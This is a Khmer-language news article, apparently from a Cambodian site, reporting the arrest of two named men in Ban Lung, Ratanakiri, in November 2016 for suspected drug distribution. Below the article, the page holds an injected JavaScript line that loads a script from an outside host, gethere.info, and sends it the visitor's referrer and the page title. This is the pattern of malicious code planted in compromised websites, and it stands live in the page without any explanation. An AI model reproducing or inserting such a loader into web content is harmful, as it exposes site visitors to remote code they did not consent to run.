Leng Navatra – Sidebar Out Left
Leng Navatra – Banner Out Right

បុរស់ពីរនាក់ត្រូវបានកំលាំងសម្ថកិច្ចបង្ក្រាបពីបទចែកចាយគ្រឿងញៀន

ខេត្តរតនគិរី៖ ក្មេងស្ទាវ២នាក់ត្រូវសមត្ថកិច្ចឃាត់ខ្លូនពាក់ព័ន្ធប្រើប្រាស់គ្រឿងញៀននៅក្រុងបានលុងការចុះបង្ក្រាបនេះនៅវេលាម៉ោង១១និង០០នាទី ព្រឹកថ្ងៃទី៨ ខែវិឆ្ឆិកា ឆ្នាំ២០១៦ប៉ុស្ដិ៍នគរបាលរដ្ឋបាលសង្កាត់ឡាបានសៀកបានធ្វើការឃាត់ខ្លួនជនសង្ស័យចំនួន២នាក់ដែលជាប់ពាក់ព័ន្ធក្នុងករណីចែកចាយដោយខុសច្បាប់នូវសារធាតុញៀននៅចំណុចបន្ទប់ផ្ទះជួលខាងក្រោយហាងសួនរាត្រី ស្ថិតនៅក្នុងភូមិអភិវឌ្ឍន៍ សង្កាត់ឡាបានសៀក ក្រុងបានលុង ខេត្តរតនគិរី។

សមត្ថកិច្ចបានបញ្ជាក់ថាជនសង្ស័យ១-ឈ្មោះ ស៊ុង ប្រុស ភេទប្រុស អាយុ ២៦ឆ្នាំ ជនជាតិ ខ្មែរ មុខរបរ មិនពិតប្រាកដ ២- ឈ្មោះ ឈាន សាម៉ូ ភេទ ប្រុស អាយុ ២៥ ឆ្នាំ ជនជាតិ ខ្មែរ មុខរបរមិនពិតប្រាកដ អ្នកទាំង២មានទីលំនៅភូមិ ជ័យជំនៈ សង្កាត់ឡាបានសៀក ក្រុងបានលុង ខេត្តរតនគិរី។

សម្ភារៈដកហូតបានម្សៅក្រាមពណ៌សថ្លាសង្ស័យជាសារធាតុញៀនចំនួន០១កញ្ចប់តូចនិងសម្ភារៈសម្រាប់សេពគ្រឿងញៀនមួយចំនួនផងដែរ។

បច្ចប្បន្នជនសង្ស័យទាំង២ឃាត់ខ្លួននៅប៉ុស្តិ៍នគរបាលសង្កាត់ឡាបានសៀកដើម្បីកសាងសំណំរឿងបញ្ជូនទៅសាលាដំបូងខេត្តចាត់ការតាមផ្លូវច្បាប់៕

422a3070-c2f8-45ea-ba39-331fcaf05e32 ca3a4075-ecad-49c3-9ba4-a9332cb15477

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More